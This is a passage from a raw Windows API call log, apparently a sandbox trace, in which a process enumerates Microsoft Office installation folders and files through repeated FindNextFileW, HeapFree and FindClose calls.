hHeap=0x5d0000) returned 1 [0067.864] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Style", cAlternateFileName="")) returned 1 [0067.866] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.866] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Style", cAlternateFileName="")) returned 0 [0067.866] FindClose (in: hFindFile=0x4260288 | out: hFindFile=0x4260288) returned 1 [0067.866] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0067.866] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x17774bfd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17774bfd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="BORDERS", cAlternateFileName="")) returned 1 [0067.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0067.868] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cf4318, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf7e60, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="BSTORM.DLL", cAlternateFileName="")) returned 1 [0067.870] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0067.870] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c80c48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c80c48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca4703d4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ee58, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="CONTAB32.DLL", cAlternateFileName="")) returned 1 [0067.877] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.877] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b60d2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6b60d2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6b60d2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x90e8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DELIMWIN.FAE", cAlternateFileName="")) returned 1 [0067.878] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0067.878] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5bd0a0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="cpprest140_2_6.dll", cAlternateFileName="CPPRES~1.DLL")) returned 1 [0067.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.879] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0067.879] FindClose (in: hFindFile=0x4260608 | out: hFindFile=0x4260608) returned 1 [0067.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.879] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d9058b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0067.879] FindClose (in: hFindFile=0x4260388 | out: hFindFile=0x4260388) returned 1 [0067.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0067.879] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4d40834, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17dec0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="DRILLDWN.DLL", cAlternateFileName="")) returned 1 [0067.887] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0067.887] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb548de7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff0bc27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0067.887] FindClose (in: hFindFile=0x4260488 | out: hFindFile=0x4260488) returned 1 [0067.887] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0067.887] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4dd9107, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15f450, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="GANTT.DLL", cAlternateFileName="")) returned 1 [0068.678] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0068.678] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ManagedObjects", cAlternateFileName="MANAGE~1")) returned 1 [0068.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0068.680] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Servers", cAlternateFileName="")) returned 1 [0068.680] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0068.680] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Servers", cAlternateFileName="")) returned 0 [0068.681] FindClose (in: hFindFile=0x4260388 | out: hFindFile=0x4260388) returned 1 [0068.681] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.681] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verisign", cAlternateFileName="")) returned 1 [0068.682] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0068.683] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1865b8d4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Components", cAlternateFileName="COMPON~1")) returned 0 [0068.683] FindClose (in: hFindFile=0x4260748 | out: hFindFile=0x4260748) returned 1 [0068.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.683] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verisign", cAlternateFileName="")) returned 0 [0068.683] FindClose (in: hFindFile=0x4260288 | out: hFindFile=0x4260288) returned 1 [0068.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.683] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18681a5c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Sounds", cAlternateFileName="")) returned 1 [0068.685] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.685] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1907d846, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1907d846, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Places", cAlternateFileName="")) returned 1 [0068.688] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.688] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Things", cAlternateFileName="")) returned 1 [0068.690] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.690] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Things", cAlternateFileName="")) returned 0 [0068.690] FindClose (in: hFindFile=0x4260488 | out: hFindFile=0x4260488) returned 1 [0068.690] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.690] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1907d846, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b6c9560, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolBMPs", cAlternateFileName="")) returned 1 [0068.693] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.693] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolData", cAlternateFileName="")) returned 1 [0068.696] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0068.696] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Computers", cAlternateFileName="COMPUT~1")) returned 1 [0068.708] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0068.708] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Computers", cAlternateFileName="COMPUT~1")) returned 0 [0068.708] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0068.708] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.708] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1983d259, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="groove.net", cAlternateFileName="")) returned 0 [0068.708] FindClose (in: hFindFile=0x4260488 | out: hFindFile=0x4260488) returned 1 [0068.708] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.709] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 1 [0068.714] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.714] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 0 [0068.714] FindClose (in: hFindFile=0x4260088 | out: hFindFile=0x4260088) returned 1 [0068.714] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0068.715] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdd36584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdf403dbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf58154c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf370c0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="GROOVE.EXE", cAlternateFileName="")) returned 1 [0068.717] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.717] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="EUROTOOL.XLAM", cAlternateFileName="EUROTO~1.XLA")) returned 1 [0068.717] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.717] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SOLVER", cAlternateFileName="")) returned 0 [0068.717] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0068.717] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0068.717] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b27715c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b27715c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="LogoImages", cAlternateFileName="LOGOIM~1")) returned 1 [0069.393] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.394] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdd0d91a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xde4d0d64, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1979a48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="lync.exe", cAlternateFileName="")) returned 1 [0069.399] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43a20e8 | out: hHeap=0x5d0000) returned 1 [0069.399] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x38b7c4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="MeetingJoinAxOC.dll", cAlternateFileName="MEETIN~1.DLL")) returned 1 [0069.402] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.402] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bg", cAlternateFileName="")) returned 1 [0069.403] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.403] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca", cAlternateFileName="")) returned 1 [0069.403] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0069.403] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf803d796, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, 